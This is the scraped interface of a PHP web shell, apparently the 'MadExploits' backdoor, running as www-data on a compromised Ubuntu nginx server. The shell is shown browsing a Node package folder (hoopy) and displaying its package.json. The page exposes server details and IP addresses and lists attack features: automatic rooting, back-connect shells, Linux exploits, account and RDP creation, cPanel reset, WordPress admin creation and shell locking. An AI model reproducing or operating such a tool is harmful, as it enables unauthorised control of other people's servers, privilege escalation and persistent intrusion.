Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
hoopy /
[ HOME SHELL ]
Name
Size
Permission
Action
.eslintrc
4.91
KB
-rw-rw-rw-
.gitlab-ci.yml
316
B
-rw-rw-rw-
AUTHORS
106
B
-rw-rw-rw-
CHANGELOG.md
763
B
-rw-rw-rw-
CONTRIBUTING.md
464
B
-rw-rw-rw-
LICENSE
1.03
KB
-rw-rw-rw-
README.md
3.21
KB
-rw-rw-rw-
index.js
1.87
KB
-rw-rw-rw-
package.json
852
B
-rw-rw-rw-
test.js
6.5
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "hoopy", "version": "0.1.4", "license": "MIT", "description": "Like an array, but rounder.", "keywords": [ "data", "structure", "collection", "array", "circular", "extends", "proxy" ], "author": "Phil Booth <pmbooth@gmail.com> (https://philbooth.me/)", "main": "index.js", "engines": { "node": ">= 6.0.0" }, "scripts": { "lint": "eslint .", "test": "mocha --es_staging --ui tdd test.js", "release": "release" }, "repository": { "type": "git", "url": "git+https://gitlab.com/philbooth/hoopy.git" }, "homepage": "https://gitlab.com/philbooth/hoopy#readme", "bugs": { "url": "https://gitlab.com/philbooth/hoopy/issues" }, "devDependencies": { "chai": "^4.1.2", "eslint": "^3.19.0", "mocha": "^5.2.0", "please-release-me": "^2.0.2" } }
Close